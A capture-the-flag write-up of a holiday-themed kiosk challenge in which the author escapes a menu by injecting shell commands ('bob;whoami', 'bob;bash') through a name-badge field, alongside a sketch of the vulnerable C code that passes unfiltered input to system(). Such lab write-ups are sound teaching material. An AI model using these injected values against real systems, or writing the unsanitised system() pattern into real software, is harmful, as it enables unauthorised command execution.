Kiosk 2: Kringle Kiosk
Kiosk 2 presents me with a challenge relating to a shell escape. Can I escape the menu and into a bash shell?
This Kiosk was located outside in front of the castle entrance, right next to Shinny Upatree and the Investigate S3 Bucket Objective.
First, I am presented with the initial challenge:
Welcome to our castle, we're so glad to have you with us!
Come and browse the kiosk; though our app's a bit suspicious.
Poke around, try running bash, please try to come discover,
Need our devs who made our app pull/patch to help recover?
Escape the menu by launching /bin/bash
Press enter to continue...
Followed by:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Welcome to the North Pole!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Map
2. Code of Conduct and Terms of Use
3. Directory
4. Print Name Badge
5. Exit
Please select an item from the menu by entering a single number.
Anything else might have ... unintended consequences.
Enter choice [1 - 5]
At this point, it is a matter of fuzzing all of the inputs we possibly can here. The menu selector doesn't seem to be exploitable as far as I can tell, since if I enter anything other than a number I am met with an error, and even giving it a number like 2334232534239472398429348723 only selects the '2' menu selection, the Code of Conduct and Terms of Use, which means the menu selection screen most likely only reads the first byte of whatever input is sent to it. Guess a buffer overflow is out of the question. Though I wouldn't expect something like that as the second kiosk challenge.
Exploring the menu shows some fun things:
Enter choice [1 - 5] 1
__ _ --------------
|__)_ _ (_ | NetWars Room |
| \(_)(_)| | |
| * |
--------------
__ __ __ __
_)|_ _)|_ -------
/__| Tracks __)| |Balcony|
1 2 3 4 5 6 7 -------
------- ------------- |
|Speaker|--| Talks Lobby | --------
|Unprep | | | |Santa's |
------- ------ | |Office |
| | -- --
| *| | |
------ | ---
| * |
__ ------
/||_
|| __ __ --------
-------------------------- /| |_ |_ |Wrapping|
| Courtyard | |.__)| | Room |
-------------------------- --------
| | |
------ -------- ------ --- --------
|Dining|--|Kitchen |--|Great | |--|Workshop|
| | -------- | | | | |
| Room |--| * |--| Room | | | |
| | |Entryway| | | | | |
------ -------- ------ | | |
| | * |
---------- --------
|Front Lawn| NOTE: * denotes Santavator
----------
Press [Enter] key to continue...
Cool looking map that I absolutely referenced quite a bit throughout the event.
Enter choice [1 - 5] 3
Name: Floor: Room:
Ribb Bonbowford 1 Dining Room
Noel Boetie 1 Wrapping Room
Ginger Breddie 1 Castle Entry
Minty Candycane 1.5 Workshop
Angel Candysalt 1 Great Room
Tangle Coalbox 1 Speaker UNPreparedness
Bushy Evergreen 2 Talks Lobby
Holly Evergreen 1 Kitchen
Bubble Lightington 1 Courtyard
Jewel Loggins Front Lawn
Sugarplum Mary 1 Courtyard
Pepper Minstix Front Lawn
Bow Ninecandle 2 Talks Lobby
Morcel Nougat 2 Speaker UNPreparedness
Wunorse Openslae R NetWars Room
Sparkle Redberry 1 Castle Entry
Jingle Ringford NJTP
Piney Sappington 1 Castle Entry
Chimney Scissorsticks 2 Talks Lobby
Fitzy Shortstack 1 Kitchen
Alabaster Snowball R NetWars Room
Eve Snowshoes 3 Santa's Balcony
Shinny Upatree Front Lawn
Tinsel Upatree 3 Santa's Office
Press [Enter] key to continue...
A directory of elves and their respective locations. Another thing that came in handy.
The Code of Conduct and Terms of Use was mostly legalese and not interesting enough for this writeup. But the fourth entry, 'Print Name Badge' was interesting...
Enter choice [1 - 5] 4
Enter your name (Please avoid special characters, they cause some weird errors)...
If that isn't a hint then I don't know what is. To see what it does, I use the name "Bob." My real name isn't Bob BTW.
Enter your name (Please avoid special characters, they cause some weird errors)...bob
_____
< bob >
-----
\
\ \_\_ _/_/
\ \__/
(oo)\_______
(__)\ )\/\
||----w |
|| ||
Press [Enter] key to continue...
It uses cowsay! Or...reindeersay? Either way, that's a separate binary. Most likely this menu performs something like:
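#include <stdlib.h>  /* system */
#include <string.h>  /* strncat, strlen */
char reindeer[256] = "/usr/bin/reindeersay ";  /* large enough to hold the appended name */
strncat(reindeer, argv[1], sizeof(reindeer) - strlen(reindeer) - 1);  /* name appended unfiltered */
system(reindeer);  /* sh -c parses the string, so ';' starts a second command */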
And so, by injecting something like bob; whoami we get:
Enter your name (Please avoid special characters, they cause some weird errors)...bob;whoami
_____
< bob >
-----
\
\ \_\_ _/_/
\ \__/
(oo)\_______
(__)\ )\/\
||----w |
|| ||
*shinny*
Press [Enter] key to continue...
Note the shinny! It executed whoami!
So therefore...
Enter your name (Please avoid special characters, they cause some weird errors)...bob;bash
_____
< bob >
-----
\
\ \_\_ _/_/
\ \__/
(oo)\_______
(__)\ )\/\
||----w |
|| ||
___ _
/ __| _ _ __ __ ___ ___ ___ | |
\__ \ | +| | / _| / _| / -_) (_-< (_-< |_|
|___/ \_,_| \__|_ \__|_ \___| /__/_ /__/_ _(_)_
_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_| """ |
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
Type 'exit' to return to the menu.
Escaped!